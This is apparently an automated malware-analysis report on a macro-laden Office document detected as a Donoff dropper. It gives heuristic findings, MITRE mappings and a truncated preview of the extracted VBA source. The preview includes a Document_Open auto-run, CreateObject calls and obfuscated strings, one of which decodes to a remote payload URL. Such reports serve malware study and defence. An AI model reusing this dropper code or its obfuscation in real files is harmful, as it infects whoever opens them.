MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a Microsoft Office document containing a VBA macro that is automatically executed via the Document_Open subroutine. Heuristics indicate the use of CreateObject and CallByName, common for executing malicious code. The ClamAV detection 'Doc.Dropper.Donoff-5743527-0' strongly suggests this is a dropper malware designed to download and execute a secondary payload.
Heuristics 7
-
ClamAV: Doc.Dropper.Donoff-5743527-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Donoff-5743527-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 17808 bytes |
SHA-256: 9f3c004e1949519177aee861f536fadfe6cb803a517827ec278546963cba141e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub JRFABdjW(ByVal WxWnv As String, ByVal flNaQqqXMdBi As Integer)
CoUhlPI True, "VhY", 9044
HVoGUKq "zG1pF", ""
caINRnNgmrdBGB
ZqWcwMU = 6741
If YBwEfB("", 886, 440) Then
MCIRRhcWzSwqI = 9024
dXTbMEvLlRYkf
QPZMMG 1883
yNIAaBuA = 3192
FuKbI "hASM"
WbWJaj = "fg"
Else
pEdOivefzGcBr 653, 5024, 4694
kiqhklkDD "", 9258
xvRpty
iAskzZcbwSl = False
End If
End Sub
Private Sub sAhugHIUKqrD(ByVal flotDIOUrg As Integer)
fTIAKCTaT "AQ", "doAZ", "YOc"
ciakz = 358
qgnhuOW
NRVJGGEh = "k8dcd"
If sQwkQLsArLMcUw(True, 55, True) Then
cSCQOywsTKpZCF = 4069
JpRiivoHBbda 555, "31U", 2131
ukyxFsqVYMlGmV = ""
GcZNjPtLkErWeg
Else
pstSHytyc
nlrxViMtSiPX 9355
CyjPEQTSJim = "DEMd"
End If
End Sub
Private Sub Document_Open()
Dim jGQelHTesX As Integer
Dim imZPinFZXxBLwJ As Boolean
gBocEztRZe.wHABdRYucxkmp
End Sub
Attribute VB_Name = "gBocEztRZe"
Private Sub DpnMXbaFQHyTb(ByVal MkiINAGNaSq As String, ByVal pEBmq As String)
ADsgsMKdqQm "pniSO"
bHEFyq = "k7DCA"
VjSpLvTwSVVK "GUo", "", True
End Sub
Private Sub JZbQPKQo(ByVal KKVDUgmnjBqO As Integer, ByVal KYInwmvFPvUNtB As String)
VqknpLDo 3110
QtMhVXMnx = 6371
XNDLLDSArtDiw "3zz7", "hVE"
naMRsVze = True
ByjSxLNuJjA
End Sub
Private Sub sRbktzw(ByVal BimTLbpWzAG As String, ByVal RZYssLykifh As Boolean)
yEKxYLxHlxTlao
huyzKe
aqGuhjnT
End Sub
Public Function fnoFLMswUo(ByVal SWiwTdfVQDpdB As String, ByVal ttMud As String) As Object
Dim KLjDf As Integer
Dim fKuGFuHSjjbj As String
Set fnoFLMswUo = HZgyWNsaPSsS(CreateObject(SWiwTdfVQDpdB))
End Function
Public Sub wHABdRYucxkmp()
Dim kPZEP As String
Dim sVBcLmORzyyD As Integer
On Error GoTo rNuIwHyNdUPoEG
gbPzqQLPY.CsBvQWENw
gbPzqQLPY.EFsfKwbYJxmQ
cfXbaYPZNQOtqz
Exit Sub
rNuIwHyNdUPoEG:
End Sub
Private Sub fuibvbSsmHEnSg(ByVal wPHvLHFBsGvm As String)
uMlTbiuEDW = "7sE"
If qovZlzXQJaPk Then
eEIhAAsS False, "fjI"
FLerwdF
iIdbmQAUIKPwIR True
Else
DQEEO 2123
End If
dtXGRzAEowlu "sqrs", 972
End Sub
Private Function HZgyWNsaPSsS(ByVal TrkGkKZoKNFi As Object) As Object
Dim VgUNeGbHtO As Integer
Set HZgyWNsaPSsS = TrkGkKZoKNFi
End Function
Private Sub eKAezceixnOzP(ByVal qjcgqTUfslCvxr As String, ByVal sKLMzowLwrQM As String, ByVal wsdLkdM As String)
Set kYGJHJXUOJlFcU = kKUAAZOCX.oijIXkkHqAawCe(True, wsdLkdM)
kKUAAZOCX.pVMGKrxD KsWqfMu, 2670, "", kYGJHJXUOJlFcU
lSDsdu.njaVJTRMFt mefgZvMHtYwz.MVlgvdkxDSU(qhUoIHckSe, kYGJHJXUOJlFcU, 8879), False, "xowQ", qjcgqTUfslCvxr
End Sub
Private Sub cfXbaYPZNQOtqz()
Dim vkmHO As Boolean
eKAezceixnOzP lSDsdu.OcpeVPx, "Bq0", zvXPQwVQaa
lSDsdu.WwdhmPbSQvgYha False, 618, lSDsdu.OcpeVPx
End Sub
Private Function KsWqfMu() As String
KsWqfMu = KWFclpEjCqnK.RnoQoSniML("Cza4Inz'tM ZPdo4w4nzIlJoMad3I b1i3PnzarMyZM f4JiJleZ", "PJzM13:I4Z")
End Function
Private Function qhUoIHckSe() As String
qhUoIHckSe = KWFclpEjCqnK.RnoQoSniML("kR3esv0p5onTvsDeBT5okdyA", "Dv5Tw4r3Ak0")
End Function
Private Function zvXPQwVQaa() As String
zvXPQwVQaa = KWFclpEjCqnK.RnoQoSniML("6hMttvp6v:u//Mbn6riGnt6caurUnt.nvcovGm/nbMUr6it6Ust6a6rn/uovvffuiucuUe1Un2.66dUat6av", "6nUMGuv")
End Function
Attribute VB_Name = "KWFclpEjCqnK"
Private Function YvofeRYoJx(ByVal rqvdIyAUeUs As Integer, ByVal jMtqQGmpJin As Integer, ByVal NibKbo As String, ByVal umAlGRCJBPXknQ As String) As String
If Not ZpdFV.ANWBfONcAV(umAlGRCJBPXknQ, False, False, NibKbo) Then
YvofeRYoJx = umAlGRCJBPXknQ
End If
End Function
Private Function XxrCMfhKm(ByVal GkQnFe As String) As String
jnuAOI
edgIIAzipXGERW = False
qldsDWDYOa
XxrCMfhKm = ""
End Function
Public Function RnoQoSniML(ByVal ixatViSCOYEyL As String, ByVal rjCYiBeI As String) As String
yhpPbbGZz = 4259
For JXNRhtyPpgrk = HXJhwfTZdLUHOJ To ZpdFV.SJWbYo("n4mC", "HA", ixatViSCOYEyL)
CAQbL = 8749
RnoQoSniML = ZpdFV.CAkUwqfVdJEw(5793, RnoQ
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.